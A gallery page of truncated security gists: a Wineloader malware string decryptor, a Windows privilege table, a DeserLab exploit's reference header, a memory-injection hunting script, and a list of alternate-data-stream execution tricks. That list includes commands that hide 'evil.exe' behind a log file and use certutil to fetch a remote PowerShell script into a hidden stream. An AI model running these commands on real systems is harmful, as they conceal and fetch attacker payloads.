Nasreddine Bencherchali nasbench

@X-Junior
X-Junior / Wineloader_String_Decryptor.py
Created April 18, 2024 19:47
Wineloader Static String Decryptor
from Crypto.Cipher import ARC4
from capstone import *
from capstone.x86 import *
import pefile, sys, os
'''
Author: Mohamed Ashraf (@X__Junior)
Make sure you are passing wineloader and not the loader of wineloader. If you suspect it is the loader, use https://raw.githubusercontent.com/tccontre/KnowledgeBase/main/malware_re_tools/wineloader_dll_side_load/wineloader_extractor.py to extract the shellcode.
tested samples:
27c0935a22862475bb3fd516f93bd466f8021f77727e83f53d67d76978b439ee
@jsecurity101
jsecurity101 / Privileges.txt
Created July 23, 2022 01:00
System privileges and their values
Author: Jonathan Johnson
Data pulled via winnt.h / LookupPrivilegeValue
SE_CREATE_TOKEN_NAME / SeCreateTokenPrivilege / 2
SE_ASSIGNPRIMARYTOKEN_NAME / SeAssignPrimaryTokenPrivilege / 3
SE_LOCK_MEMORY_NAME / SeLockMemoryPrivilege / 4
SE_INCREASE_QUOTA_NAME / SeIncreaseQuotaPrivilege / 5
SE_MACHINE_ACCOUNT_NAME / SeMachineAccountPrivilege / 6
SE_TCB_NAME / SeTcbPrivilege / 7
SE_SECURITY_NAME / SeSecurityPrivilege / 8
@api0cradle
api0cradle / Exe_ADS_Methods.md
Last active May 2, 2024 18:10
Execute from Alternate Streams

Add content to ADS

type C:\temp\evil.exe > "C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.log:evil.exe"

extrac32 C:\ADS\procexp.cab c:\ADS\file.txt:procexp.exe

findstr /V /L W3AllLov3DonaldTrump c:\ADS\procexp.exe > c:\ADS\file.txt:procexp.exe

certutil.exe -urlcache -split -f https://raw.githubusercontent.com/Moriarty2016/git/master/test.ps1 c:\temp:ttt

makecab c:\ADS\autoruns.exe c:\ADS\cabtest.txt:autoruns.cab

@DiabloHorn
DiabloHorn / deserlab_exploit.py
Created September 9, 2017 18:37
Exploit for the DeserLab vulnerable implementation
#!/usr/bin/env python
"""
DiabloHorn - https://diablohorn.com
References
https://nickbloor.co.uk/2017/08/13/attacking-java-deserialization/
https://deadcode.me/blog/2016/09/02/Blind-Java-Deserialization-Commons-Gadgets.html
https://deadcode.me/blog/2016/09/18/Blind-Java-Deserialization-Part-II.html
http://gursevkalra.blogspot.nl/2016/01/ysoserial-commonscollections1-exploit.html
https://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/
https://www.slideshare.net/codewhitesec/exploiting-deserialization-vulnerabilities-in-java-54707478
@jaredcatkinson
jaredcatkinson / Get-InjectedThread.ps1
Last active April 22, 2024 19:09
Code from "Taking Hunting to the Next Level: Hunting in Memory" presentation at SANS Threat Hunting Summit 2017 by Jared Atkinson and Joe Desimone
function Get-InjectedThread
{
<#
.SYNOPSIS
Looks for threads that were created as a result of code injection.
.DESCRIPTION